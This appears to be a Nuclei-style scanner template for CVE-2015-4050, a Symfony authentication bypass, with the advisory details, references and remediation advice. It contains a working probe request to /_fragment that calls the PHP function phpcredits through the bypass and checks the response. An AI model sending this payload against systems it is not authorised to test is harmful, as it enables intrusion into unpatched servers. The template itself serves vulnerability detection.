id: CVE-2015-4050 info: name: Symfony - Authentication Bypass author: ELSFA7110,meme-lord severity: medium description: Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment in the HttpKernel component. remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Symfony. reference: - https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access - http://symfony.com/blog/cve-2015-4050-esi-unauthorized-access - http://www.debian.org/security/2015/dsa-3276 - https://nvd.nist.gov/vuln/detail/CVE-2015-4050 - http://lists.fedoraproject.org/pipermail/package-announce/2015-June/159513.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-4050 cwe-id: CWE-284 epss-score: 0.00847 epss-percentile: 0.80251 cpe: cpe:2.3:a:sensiolabs:symfony:2.3.19:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sensiolabs product: symfony tags: cve,cve2015,symfony,rce http: - method: GET path: - "{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1" matchers-condition: and matchers: - type: word part: body words: - "PHP Credits" - type: status status: - 200 # digest: 4b0a00483046022100b8da92970a6e510230733d16cc0e4f1d6e51a5363a7259d2be76b1ea89b2c3410221009b3ed70b524e380c926a5d80d9397d8aff9279ff55fd361b38c35c70aeed21d7:922c64590222798bb761d5b6d8e72950